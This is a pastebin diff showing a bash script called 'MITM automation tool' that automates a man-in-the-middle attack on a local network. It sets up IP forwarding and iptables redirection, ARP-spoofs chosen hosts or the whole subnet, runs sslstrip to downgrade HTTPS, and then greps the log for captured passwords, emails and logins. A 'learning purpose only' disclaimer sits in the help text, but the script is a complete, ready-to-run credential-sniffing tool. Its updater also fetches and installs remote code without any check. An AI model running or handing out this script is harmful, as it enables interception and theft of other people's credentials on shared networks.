View difference between Paste ID: NM4T4H6b and
SHOW:
|
|
- or go back to the newest paste.
1 | - | |
1 | + | #!/bin/bash |
2 | # Little bash script to launch man it the middle attack and sslstrip. | |
3 | # version 0.6 by comaX | |
4 | PROGNAME=$(basename $0) | |
5 | VERSION="0.6.2" | |
6 | #Let's define some arguments that can be passed to the script : | |
7 | args= | |
8 | while [ $# -ge 1 ] #check parameters | |
9 | do | |
10 | case $1 in | |
11 | -h | --help) #define help message | |
12 | clear | |
13 | echo -e "You are running $0, version $VERSION. | |
14 | ||
15 | usage : $0 [-h | --help] | [-u | --upadte] | |
16 | -h or --help : displays this help message, disclaimer and exit. | |
17 | -u or --update updates and installs this script | |
18 | ||
19 | \033[31m DISCLAIMER :\033[m | |
20 | This program is intended for learning purpose only. I do not condone hacking | |
21 | and wouldn't be held responsible for you actions. Only you would face legal | |
22 | consequences if you used this script for illegal activities. | |
23 | ||
24 | \033[31m What I think should be learnt from this script :\033[m | |
25 | This script should teach you how easy it is to steal sensitive online | |
26 | credential and how to protect you from it, provided you understand | |
27 | what this program does. The best way to understand what it does is | |
28 | to look at its source. This will also teach you very basic shell script | |
29 | programming. | |
30 | ||
31 | \033[31m Changelog :\033[m | |
32 | added in v0.6 | |
33 | -Support for multiple targets | |
34 | ||
35 | added in v0.5 : | |
36 | -Parameters for this great help message and update, more comments. | |
37 | -Minor improvments | |
38 | ||
39 | added in v0.4 : | |
40 | -User friendly case insensitive answers (Y/y) | |
41 | -Option to map network, retrieving live hosts and their dns names | |
42 | -Minor improvments | |
43 | ||
44 | \033[31m Credits :\033[m | |
45 | Credits goes to all people on backtrack forums for their help and support, | |
46 | and google for being my best friend with scripting. | |
47 | ||
48 | Please criticize this program or submit ideas on the official thread at | |
49 | http://tiny.cc/mitmautomate or send me a mail at cyprien.bl@gmail.com" | |
50 | exit ;; | |
51 | -u | --update) #update program | |
52 | echo "This will download the last version from official website, and then install it to /usr/bin/mitm. Program will then exit and reload new version. In next uses you will only have to issue 'mitm' from your console. Do you wish to proceed ? (Y/N)" | |
53 | read -e proceed | |
54 | if [[ $proceed = "y" || $proceed = "Y" ]] ; then | |
55 | wget http://comax.pagesperso-orange.fr/mitm.sh -O /tmp/mitm_update.sh #download most recent version to temp file | |
56 | cp /tmp/mitm_update.sh /usr/bin/mitm #copy it to /usr/bin | |
57 | rm /tmp/mitm_update.sh #delete temp file | |
58 | echo -e "\033[32m Script updated ! Restarting to updated version...\033[m" | |
59 | sleep 3 | |
60 | chmod +x /usr/bin/mitm #make newly installed script executable | |
61 | /usr/bin/mitm #launch new script | |
62 | else echo -e "\033[31m Update aborted.\033[m Continuing with this version (you are using $0)." & sleep 2 | |
63 | fi ;; | |
64 | *) echo "Invalid parameters, coninuing with script $0" & sleep 2 ;; | |
65 | esac | |
66 | shift | |
67 | done | |
68 | ||
69 | clear | |
70 | echo -e "=========================================================================== | |
71 | =\033[31m Welcome to MITM automation tool. Use this tool responsibly, and enjoy !\033[m = | |
72 | = Feel free to contribute, and distribute this script as you please. = | |
73 | = Official thread : http://tiny.cc/mitmautomate = | |
74 | = Check out the help (-h) to see new features and informations = | |
75 | = You are running version $VERSION. = | |
76 | ===========================================================================" | |
77 | echo | |
78 | echo | |
79 | # Starting fresh : reset ip forward and iptables | |
80 | echo -e "\033[31m [+] Cleaning iptables \033[m" | |
81 | echo "[-] Cleaned." | |
82 | echo "0" > /proc/sys/net/ipv4/ip_forward | |
83 | iptables --flush | |
84 | iptables --table nat --flush | |
85 | iptables --delete-chain | |
86 | iptables --table nat --delete-chain | |
87 | ||
88 | # Defining exit function and other ending features | |
89 | ||
90 | cleanup() { | |
91 | echo | |
92 | echo "[+] Killing processes and resetting iptable." | |
93 | ||
94 | kill ${sslstripid} | |
95 | killall arpspoof | |
96 | echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding | |
97 | iptables --flush # there are probably too many resets here, | |
98 | iptables --table nat --flush # but at least we're sure everything's clean | |
99 | iptables --delete-chain | |
100 | iptables --table nat --delete-chain | |
101 | ||
102 | echo "[+] Clean up successful..." | |
103 | echo -e "\033[31m [+] Let's have a look at sniffed passwords... \033[m" #Displaying results | |
104 | echo -e "\033[37m (Will be blank if no passwords were found) \033[m" | |
105 | egrep --color -i "&pwd=|&pass=|&passwd=|&password=|&textbox=|&email=|&user=|&login=" /tmp/$filename.txt #colorize all search terms when found | |
106 | echo | |
107 | echo "Do you want to keep log file for further use or shall we delete it ? (Y=keep)" | |
108 | echo "If you want to keep it, it will be stored in /root/$filename.txt" | |
109 | read -e keep | |
110 | if [[ $keep = "Y" || $keep = "y" ]] ; then # double brackets because double condition. || signifies "or" | |
111 | mv /tmp/$filename.txt /root/$filename.txt #moving file | |
112 | if [ -f "/root/$filename.txt" ]; then #check if it exists | |
113 | echo "Log file copied !" #it does | |
114 | else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not | |
115 | fi | |
116 | else rm /tmp/$filename.txt #removing temp file | |
117 | echo "All logs deleted" | |
118 | fi | |
119 | if [ -f "/usr/bin/mitm" ]; then #check if script is already installed | |
120 | echo | |
121 | echo | |
122 | exit 1 #if yes, exit. | |
123 | else | |
124 | echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'mitm' in console ? (Y/N)" #if no, ask. | |
125 | read -e install | |
126 | if [[ $install = "Y" || $install="y" ]] ; then | |
127 | cp ./mitm.sh /usr/bin/mitm #copy and rename script | |
128 | echo -e "\033[32m Script installed !\033[m" | |
129 | else echo "Script not installed." | |
130 | fi | |
131 | fi | |
132 | ||
133 | exit | |
134 | } | |
135 | ###############################End of functions############################# | |
136 | # IP forwarding | |
137 | echo | |
138 | echo -e "\033[31m [+] Activating ip forwarding... \033[m" | |
139 | echo "1" > /proc/sys/net/ipv4/ip_forward | |
140 | echo "[-] Activated." | |
141 | ||
142 | #Iptables | |
143 | echo | |
144 | echo -e "\033[31m [+] Configuring iptables... \033[m" | |
145 | echo -en "\033[31m To \033[mwhat port should the traffic be redirected to ? (generally 10000)" | |
146 | echo | |
147 | read -e outport | |
148 | echo -en "\033[31m From \033[mwhat port should the traffic be redirected to ? (generally 80)" | |
149 | echo | |
150 | read -e inport | |
151 | echo -e "\033[33m Traffic from port $inport will be redirected to port $outport \033[m" | |
152 | iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport | |
153 | echo "[-] Traffic rerouted" | |
154 | ||
155 | #Arpspoofing | |
156 | echo | |
157 | echo -e "\033[31m [+] Activating arpspoofing... \033[m" | |
158 | echo | |
159 | ip route show | grep ^default #ip route show, minimized to line begining with "default" : this is the one we need. | |
160 | echo | |
161 | echo "Enter gateway ip adress (as shown above) :" | |
162 | read -e gateway | |
163 | echo | |
164 | echo "What interface would you like to use ? (it should match gateway ip as shown above)" | |
165 | read -e iface | |
166 | echo | |
167 | echo "Would you like to target multiple (or single) targets or the whole network ? (Y=whole, N=single/multiple)" | |
168 | read -e choicearp | |
169 | echo | |
170 | ||
171 | if [[ $choicearp = "N" || $choicearp = "n" ]] ; then | |
172 | echo | |
173 | echo -e "Do you want to map network to show live hosts ? (Y/N) [This might take up to 30 secs, be patient]" | |
174 | read -e hosts | |
175 | echo -e "\033[31m " | |
176 | if [[ $hosts = "Y" || $hosts = "y" ]] ; then | |
177 | fping -anA -q -g $gateway/24 -r 0 &> /tmp/hosts.txt #search for live hosts, displaying ip and dns name and write to file to avoid 255 lines showing up | |
178 | grep -v "ICMP" /tmp/hosts.txt # display all lines not containing "ICMP" (error lines, dead hosts) | |
179 | rm /tmp/hosts.txt # remove temporary file | |
180 | echo -e "\033[m " # switch color back to white | |
181 | else echo -e "\033[m " | |
182 | fi | |
183 | echo -e "You can select up to 6 ip adresses. Just enter them one after another when prompted.\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network tageting.\033[m " | |
184 | arpspoofi() { | |
185 | xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2 | |
186 | ||
187 | if [[ "$2" > "0" ]] ; then | |
188 | xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $2 $gateway 2>/dev/null & sleep 2 | |
189 | else echo | |
190 | fi | |
191 | if [[ "$3" > "0" ]] ; then | |
192 | xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $3 $gateway 2>/dev/null & sleep 2 | |
193 | else echo | |
194 | fi | |
195 | if [[ "$4" > "0" ]] ; then | |
196 | xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $4 $gateway 2>/dev/null & sleep 2 | |
197 | else echo | |
198 | fi | |
199 | if [[ "$5" > "0" ]] ; then | |
200 | xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $5 $gateway 2>/dev/null & sleep 2 | |
201 | else echo | |
202 | fi | |
203 | if [[ "$6" > "0" ]] ; then | |
204 | xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $6 $gateway 2>/dev/null & sleep 2 | |
205 | else echo | |
206 | fi | |
207 | t1=$1 | |
208 | t2=$2 | |
209 | t3=$3 | |
210 | t4=$4 | |
211 | t5=$5 | |
212 | t6=$6 | |
213 | ||
214 | } | |
215 | echo "Enter ip adresses" | |
216 | read -e parameters | |
217 | arpspoofi $parameters | |
218 | echo -e "\033[33m Targeting $t1 $t2 $t3 $t4 $t5 $t6 on $gateway on $iface\033[m" | |
219 | echo -e "[-] Arp spoofing is launched. \033[31m Keep new windows running. \033[m" | |
220 | ||
221 | elif [[ $choicearp = "Y" || $choicearp = "y" ]] ; then | |
222 | xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface $gateway & arpspoofid=$! | |
223 | sleep 2 | |
224 | echo -e "\033[33m Targeting the whole network on $gateway on $iface\033[m" | |
225 | echo -e "[-] Arp spoofing is launched. \033[31m Keep new window running. \033[m" | |
226 | ||
227 | else echo "Your choice is invalid. Quitting." | |
228 | cleanup | |
229 | fi | |
230 | ||
231 | ||
232 | #Sslstrip | |
233 | echo | |
234 | echo -e "\033[31m [+] Activating sslstrip... \033[m" | |
235 | echo "Choose filename to output :" | |
236 | read -e filename | |
237 | sslstrip -f -a -k -l $outport -w /tmp/$filename.txt & sslstripid=$! #output log to temp file | |
238 | sleep 2 #let time for sslstrip to launch. You may want to increase this time on slower machines | |
239 | echo | |
240 | echo -e "\033[33m Sslstrip will be listening on port $outport and outputing log in /tmp/$filename.txt\033[m" | |
241 | echo -e " [-] Sslstrip is running." # a bit redudant, but who cares ? | |
242 | echo | |
243 | echo -e "\033[37m Attack should be running smooth, enjoy.\033[m" | |
244 | echo | |
245 | echo -e "\033[33m To stop the attack, input 'quit' below :\033[m" | |
246 | echo | |
247 | read quitting | |
248 | if [ $quitting = "quit" ] ; then | |
249 | ||
250 | cleanup | |
251 | else echo "Bad choice. Enter quit to stop attack" | |
252 | read -e quitting | |
253 | if [ $quitting = "quit" ] ; then | |
254 | cleanup | |
255 | ||
256 | else echo "Bad choice. Enter quit to stop attack" | |
257 | read -e quitting | |
258 | if [ $quitting = "quit" ] ; then | |
259 | cleanup | |
260 | ||
261 | else echo "Bad choice. Enter quit to stop attack" | |
262 | read -e quitting | |
263 | if [ $quitting = "quit" ] ; then | |
264 | cleanup | |
265 | ||
266 | else echo "Bad choice. Enter quit to stop attack" | |
267 | echo | |
268 | echo -e "\033[31mNOW YOU'RE JUST BEING A FUCKING DOUCHE. QUITTING.\033[m" #I'm having fun here | |
269 | cleanup | |
270 | fi | |
271 | fi | |
272 | fi | |
273 | fi |